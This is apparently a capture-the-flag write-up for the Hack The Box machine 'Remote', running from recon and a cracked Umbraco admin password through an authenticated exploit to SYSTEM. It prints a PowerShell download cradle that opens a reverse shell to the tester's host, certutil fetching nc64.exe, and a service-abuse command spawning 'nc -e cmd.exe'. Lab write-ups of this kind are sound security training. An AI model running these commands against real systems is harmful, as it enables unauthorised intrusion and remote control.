Remote Write up
Welcome to my Remote Write-up
Recon
Nmap
$ sudo nmap -sSVC -A -oA nmap/Remote 10.10.10.180
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-05 14:07 EDT
Host is up (0.057s latency).
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
.
.
.
Directory bruteforce
$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.180/FUZZ
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.10.180/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 111ms]
* FUZZ:
[Status: 200, Size: 5441, Words: 1232, Lines: 162, Duration: 432ms]
* FUZZ: about-us
[Status: 200, Size: 5001, Words: 1249, Lines: 138, Duration: 271ms]
* FUZZ: Blog
[Status: 200, Size: 5001, Words: 1249, Lines: 138, Duration: 344ms]
* FUZZ: blog
[Status: 200, Size: 7880, Words: 828, Lines: 125, Duration: 3629ms]
* FUZZ: contact
[Status: 200, Size: 7880, Words: 828, Lines: 125, Duration: 3655ms]
* FUZZ: Contact
[Status: 200, Size: 6703, Words: 1807, Lines: 188, Duration: 382ms]
* FUZZ: home
[Status: 200, Size: 6703, Words: 1807, Lines: 188, Duration: 429ms]
* FUZZ: Home
[Status: 302, Size: 126, Words: 6, Lines: 4, Duration: 167ms]
* FUZZ: install
[Status: 200, Size: 3323, Words: 683, Lines: 117, Duration: 410ms]
* FUZZ: intranet
[Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 453ms]
* FUZZ: master
[Status: 200, Size: 2741, Words: 503, Lines: 82, Duration: 206ms]
* FUZZ: person
[Status: 200, Size: 6739, Words: 2109, Lines: 168, Duration: 321ms]
* FUZZ: People
[Status: 200, Size: 6739, Words: 2109, Lines: 168, Duration: 972ms]
* FUZZ: people
[Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 592ms]
* FUZZ: product
[Status: 200, Size: 5328, Words: 1307, Lines: 130, Duration: 596ms]
* FUZZ: products
[Status: 200, Size: 5328, Words: 1307, Lines: 130, Duration: 902ms]
* FUZZ: Products
[Status: 200, Size: 4040, Words: 710, Lines: 96, Duration: 103ms]
* FUZZ: umbraco
:: Progress: [4614/4614] :: Job [1/1] :: 82 req/sec :: Duration: [0:01:02] :: Errors: 0 ::
Website
http://10.10.10.180/umbraco#/login/false?returnPath=%252Fumbraco
.png)
Use Wappalyzer for more informations.
.png)
SMB
$ smbmap -H 10.10.10.180
.png)
$ smbclient -L 10.10.10.180
.png)
Access denied for smb
FTP
Nothing is in ftp apprently
.png)
NFS
$ showmount -e 10.10.10.180
.png)
$ sudo mount -t nfs 10.10.10.180:/site_backups /mnt/
.png)
$ strings umbraco.sdf
.png)
Let’s crack the hash.
.png)
Username: admin@htb.local Password: baconandcheese
.png)
Initial Foothold
Let’s go back to the umbraco web app running on port 80.
.png)
It seems that I have to be authenticted for the exploit to work
https://www.exploit-db.com/exploits/49488
We are going to upload the powercat.ps1 script to the remote machine and then execute it in order to get a rev shell on attacker machine.
$ sudo python3 umbraco.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180/ -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.2:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 5555" "
.png)
.png)
.png)
.png)
Privilege Escalation
We will need to upload PowerUp.ps1 script to the remote machine.
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
PS C:\windows\system32\inetsrv> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/PowerUp.ps1')
PS C:\windows\system32\inetsrv> Invoke-AllChecks
.png)
Let’s abuse UsoSvc
https://github.com/int0x33/nc.exe/
Download Nc64.Exe To the remote machine:
$certutil.exe -urlcache -f http://10.10.14.2:8000/nc64.exe C:\\Windows\Temp\nc64.exe
.png)
.png)
Start Python Http Server Locally
$python3 -m http.server 80
Start NetCat Listener Locally
$rlwrap nc -nvlp 1234
.png)
$Invoke-ServiceAbuse -ServiceName 'UsoSvc' -Command "C:\Windows\Temp\nc64.exe 10.10.14.2 1234 -e cmd.exe"
.png)
This post is licensed under CC BY 4.0 by the author.